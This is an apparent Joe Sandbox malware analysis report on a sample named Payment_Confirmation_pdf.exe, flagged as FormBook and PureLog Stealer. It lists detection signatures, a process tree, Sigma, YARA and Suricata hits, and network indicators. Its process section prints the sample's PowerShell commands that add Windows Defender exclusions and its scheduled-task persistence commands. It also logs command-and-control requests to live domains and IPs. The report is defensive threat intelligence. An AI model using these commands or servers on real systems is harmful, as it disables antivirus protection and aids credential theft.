Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_Confirmation_pdf.exe

Overview

General Information

Sample name:Payment_Confirmation_pdf.exe
Analysis ID:1563622
MD5:dbb00ceac5c3c668bdbb0c91df825be7
SHA1:e865268ee5de35a4fd0c4754a43a27ad1126bb72
SHA256:f600cd0546fa26d446a964c8520a7016313990d8d9886ae84778f5b474dc814e
Tags:exeuser-lowmal3
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Payment_Confirmation_pdf.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe" MD5: DBB00CEAC5C3C668BDBB0C91DF825BE7)
    • powershell.exe (PID: 7760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8140 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7868 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8032 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • mYtMtAAMpAtCOL.exe (PID: 6984 cmdline: "C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdiagnhost.exe (PID: 7468 cmdline: "C:\Windows\SysWOW64\sdiagnhost.exe" MD5: 76676F0A21E6AF109845151B3CEFE211)
          • mYtMtAAMpAtCOL.exe (PID: 2340 cmdline: "C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1180 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cQwRvD.exe (PID: 8128 cmdline: C:\Users\user\AppData\Roaming\cQwRvD.exe MD5: DBB00CEAC5C3C668BDBB0C91DF825BE7)
    • schtasks.exe (PID: 6708 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 6396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 4296 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.1427083355.0000000004129000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            10.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              10.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                0.2.Payment_Confirmation_pdf.exe.4145828.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.Payment_Confirmation_pdf.exe.5bc0000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.Payment_Confirmation_pdf.exe.5bc0000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 1 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe, ParentProcessId: 7436, ParentProcessName: Payment_Confirmation_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ProcessId: 7760, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe, ParentProcessId: 7436, ParentProcessName: Payment_Confirmation_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ProcessId: 7760, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\cQwRvD.exe, ParentImage: C:\Users\user\AppData\Roaming\cQwRvD.exe, ParentProcessId: 8128, ParentProcessName: cQwRvD.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp", ProcessId: 6708, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe, ParentProcessId: 7436, ParentProcessName: Payment_Confirmation_pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", ProcessId: 7868, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe, ParentProcessId: 7436, ParentProcessName: Payment_Confirmation_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ProcessId: 7760, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe, ParentProcessId: 7436, ParentProcessName: Payment_Confirmation_pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", ProcessId: 7868, ProcessName: schtasks.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T08:55:03.951497+010028554651A Network Trojan was detected192.168.2.749810103.224.182.24280TCP
                      2024-11-27T08:55:29.257259+010028554651A Network Trojan was detected192.168.2.749871118.107.250.10380TCP
                      2024-11-27T08:55:53.964205+010028554651A Network Trojan was detected192.168.2.749929163.44.185.18380TCP
                      2024-11-27T08:56:10.666117+010028554651A Network Trojan was detected192.168.2.749970120.26.240.12180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T08:55:21.212102+010028554641A Network Trojan was detected192.168.2.749849118.107.250.10380TCP
                      2024-11-27T08:55:23.883923+010028554641A Network Trojan was detected192.168.2.749859118.107.250.10380TCP
                      2024-11-27T08:55:26.556719+010028554641A Network Trojan was detected192.168.2.749865118.107.250.10380TCP
                      2024-11-27T08:55:45.962255+010028554641A Network Trojan was detected192.168.2.749908163.44.185.18380TCP
                      2024-11-27T08:55:48.537493+010028554641A Network Trojan was detected192.168.2.749917163.44.185.18380TCP
                      2024-11-27T08:55:51.290303+010028554641A Network Trojan was detected192.168.2.749923163.44.185.18380TCP
                      2024-11-27T08:56:02.587195+010028554641A Network Trojan was detected192.168.2.749950120.26.240.12180TCP
                      2024-11-27T08:56:05.260056+010028554641A Network Trojan was detected192.168.2.749956120.26.240.12180TCP
                      2024-11-27T08:56:07.920593+010028554641A Network Trojan was detected192.168.2.749962120.26.240.12180TCP
                      2024-11-27T08:56:17.723762+010028554641A Network Trojan was detected192.168.2.749988209.74.77.10880TCP
                      2024-11-27T08:56:22.397291+010028554641A Network Trojan was detected192.168.2.749996209.74.77.10880TCP
                      2024-11-27T08:56:25.106201+010028554641A Network Trojan was detected192.168.2.749997209.74.77.10880TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeReversingLabs: Detection: 34%
                      Source: Payment_Confirmation_pdf.exeVirustotal: Detection: 39%Perma Link
                      Source: Payment_Confirmation_pdf.exeReversingLabs: Detection: 34%
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2567539017.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1653324065.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2564166926.00000000027C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1655068800.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeJoe Sandbox ML: detected
                      Source: Payment_Confirmation_pdf.exeJoe Sandbox ML: detected
                      Source: Payment_Confirmation_pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Payment_Confirmation_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2559391595.0000000000FFE000.00000002.00000001.01000000.0000000E.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2549133517.0000000000FFE000.00000002.00000001.01000000.0000000E.sdmp
                      Source: Binary string: RegSvcs.pdb, source: sdiagnhost.exe, 00000013.00000002.2566048825.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000907000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1959082934.000000002734C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1655294935.00000000045D4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1652836303.0000000004424000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.000000000491E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.0000000004780000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1655294935.00000000045D4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1652836303.0000000004424000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.000000000491E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.0000000004780000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: sdiagnhost.pdb source: RegSvcs.exe, 0000000A.00000002.1652980431.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000003.1847590518.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: RegSvcs.pdb source: sdiagnhost.exe, 00000013.00000002.2566048825.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000907000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1959082934.000000002734C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: sdiagnhost.pdbGCTL source: RegSvcs.exe, 0000000A.00000002.1652980431.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000003.1847590518.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 4x nop then jmp 0760782Eh11_2_07607A8C

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49859 -> 118.107.250.103:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49865 -> 118.107.250.103:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49871 -> 118.107.250.103:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49950 -> 120.26.240.121:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49810 -> 103.224.182.242:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49929 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49849 -> 118.107.250.103:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49917 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49908 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49923 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49962 -> 120.26.240.121:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49970 -> 120.26.240.121:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49956 -> 120.26.240.121:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 209.74.77.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 209.74.77.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49997 -> 209.74.77.108:80
                      Source: DNS query: www.egldfi.xyz
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeDNS query: www.innovateideas.xyz
                      Source: Joe Sandbox ViewIP Address: 209.74.77.108 209.74.77.108
                      Source: Joe Sandbox ViewIP Address: 163.44.185.183 163.44.185.183
                      Source: Joe Sandbox ViewIP Address: 103.224.182.242 103.224.182.242
                      Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                      Source: Joe Sandbox ViewASN Name: OCENET-AS-APOCESdnBhdISPMY OCENET-AS-APOCESdnBhdISPMY
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD++abO8It5JcYPCkPcOnqYQu5/zxEcd3IbUYbMxclbWYqlxIiHqv/fheI5hwT1ENg4LFl9g3AAN4+0x46fdQyv+QgeI438A50saYg1ayC/pKrpcm8Y/XPrUV&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1Host: www.madhf.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                      Source: global trafficHTTP traffic detected: GET /yp7g/?d0s=+1DJNz9gq8XLlcrIMdQnpjVtkmq+0J8qQJntyAnHY0zwXJ4Cq6+S40LPv7uqAO8gziztE9nyxlcHp2WlW5MCgSEQjuWrksErLkV7H3W7JIE6+fLHeWIbuzK7jcVo7JJSnKFcAfYIk0fk&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1Host: www.zxyck.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                      Source: global trafficHTTP traffic detected: GET /aayz/?d0s=FykEsP9vX91sr4gIXaga4DgAunY4y8OIW35pWix+cNhS3OVLkBIKdkYv5gM3ZSr/GxN1W6QlvHKhJe8Q7ylOVoBzLShipJdbmb6MlmPWhdxEVrWCkEizo+iavQabSegVUCqoN7tDdJKm&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1Host: www.sankan-fukushi.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                      Source: global trafficHTTP traffic detected: GET /xzte/?Zvd8B=gHrX0lXPMBRt-RA&d0s=ePmhYLVm9S1AwYpTTSZKid9qIij+VYAwULrAeuLQsL02UG94i7HF88rql5COv5lAGhM5DGM0WOZgiTSBkG1OtvSk7+4ip8l/BrXN3KBdu4QudzDN3iYKRjIRKyxXuTAVz68t7cV2ONOD HTTP/1.1Host: www.buckser.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                      Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                      Source: global trafficDNS traffic detected: DNS query: www.zxyck.net
                      Source: global trafficDNS traffic detected: DNS query: www.egldfi.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.sankan-fukushi.info
                      Source: global trafficDNS traffic detected: DNS query: www.buckser.info
                      Source: global trafficDNS traffic detected: DNS query: www.innovateideas.xyz
